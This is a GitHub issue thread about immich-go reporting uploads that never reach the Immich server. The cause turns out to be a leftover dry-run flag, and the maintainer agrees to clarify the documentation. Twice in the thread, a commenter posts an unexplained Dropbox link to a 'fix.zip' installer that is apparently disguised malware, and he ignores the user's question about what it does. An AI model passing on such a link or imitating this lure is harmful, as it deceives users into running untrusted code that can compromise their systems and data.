### ISSUE TITLE
Nothing uploaded even though it says uploaded

### ISSUE THREAD

**Issue by CoreoftheEarth** [simulot/immich-go#463]
I'm trying to bulk upload a folder that has multiple other folders with some photography I've done for some years. The folder structure looks like this:

Z:\pictures\photosfrom202x
Z:\pictures\thunderbirdairshow202x
etc etc etc...

I am trying to upload my photos but immich-go says they are uploaded to the server when they do not show up. Immich says that no files have been uploaded, no more storage has been used, and nothing shows up in an album that I have created to put all of these images in.
![image](https://github.com/user-attachments/assets/40c5201e-05c6-409d-b012-79b5513c18ee)

The server does not have any jobs being created either, which is strange even though immich-go says it's uploading files.
I do not know why it's not actually being uploaded into the Immich server. No errors are given to indicate that it can't upload or connect, so I don't understand what is going on.

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by CoreoftheEarth** [comment]
What does this program do?

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by CoreoftheEarth** [comment]
Nevermind. Turns out I had left the dry-run command in since the documentation is not clear on what that command really does.

**Comment by simulot** [comment]
>  I had left the dry-run command in since the documentation is not clear on what that command really does

Noted... I'll rephrase it
